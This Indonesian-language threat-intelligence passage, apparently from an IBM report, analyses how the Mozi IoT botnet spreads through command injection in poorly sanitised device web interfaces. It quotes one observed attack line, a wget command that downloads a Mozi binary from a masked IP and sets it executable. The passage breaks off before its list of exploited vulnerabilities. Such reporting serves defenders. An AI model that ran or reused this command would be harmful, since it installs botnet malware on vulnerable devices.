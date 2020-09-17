Hampir semua penargetan IoT yang diamati IBM® mencoba menggunakan serangan CMDi untuk mendapatkan akses awal ke perangkat. Jika titik akhir yang ditargetkan adalah perangkat IoT dan rentan terhadap serangan ini, muatan diunduh dan dieksekusi.

Serangan CMDi sangat populer terhadap perangkat IoT karena beberapa alasan. Pertama, sistem tertanam IoT biasanya berisi antarmuka web dan antarmuka debugging yang tersisa dari pengembangan firmware yang dapat dieksploitasi. Kedua, modul PHP yang dibangun ke dalam antarmuka web IoT dapat dieksploitasi untuk memberikan kemampuan eksekusi jarak jauh kepada aktor jahat. Dan ketiga, antarmuka IoT sering dibiarkan rentan saat diterapkan karena administrator gagal mengeraskan antarmuka dengan membersihkan input yang diharapkan. Hal ini memungkinkan aktor ancaman untuk input perintah shell seperti “wget”.

Analisis kami mengungkapkan botnet Mozi memanfaatkan CMDi dengan menggunakan perintah shell “wget”, kemudian mengubah izin untuk memungkinkan aktor ancaman berinteraksi dengan sistem yang terpengaruh. Sebagai contoh:

wget http://xxx.xx.xxx.xxx/bins/mozi.a -o /var/tmp/mozi.a; chmod 777 /var/tmp/mozi.a; rm -rf /var/tmp/mozi.a

Jika host rentan terhadap CMDi, perintah ini akan mengunduh dan mengeksekusi file bernama “mozi.a.” Analisis kami terhadap sampel khusus ini menunjukkan file dieksekusi pada mikroprosesor tanpa arsitektur tahapan pipa yang saling terkait (MIPS). Ini adalah ekstensi yang dipahami oleh mesin yang menjalankan arsitektur computer set instruksi berkurang (RISC), yang lazim pada banyak perangkat IoT. Setelah penyerang mendapatkan akses penuh ke perangkat melalui botnet, level firmware dapat diubah dan malware tambahan dapat ditanam di perangkat.

Meskipun contoh ini mengutip vektor yang terkenal, itu dapat terus efektif karena dua alasan utama. Pertama, kerentanan baru memungkinkan pembaruan terus-menerus dari upaya eksploitasi melalui CMDi, dan implementasi patch yang lambat dapat dieksploitasi. Kedua, aktivitas ini mudah diotomatisasi, memungkinkan aktor ancaman untuk menyerang sejumlah besar perangkat dengan cepat dengan biaya rendah.

Infrastruktur botnet Mozi tampaknya terutama bersumber di Tiongkok, menyumbang 84% dari infrastruktur yang diamati. Fakta ini sejalan dengan riset sumber terbuka lainnya tentang aktivitas IoT pada tahun 2020.

Di bawah ini adalah daftar kerentanan yang telah diamati IBM® oleh botnet Mozi yang mencoba untuk mengeksploitasi: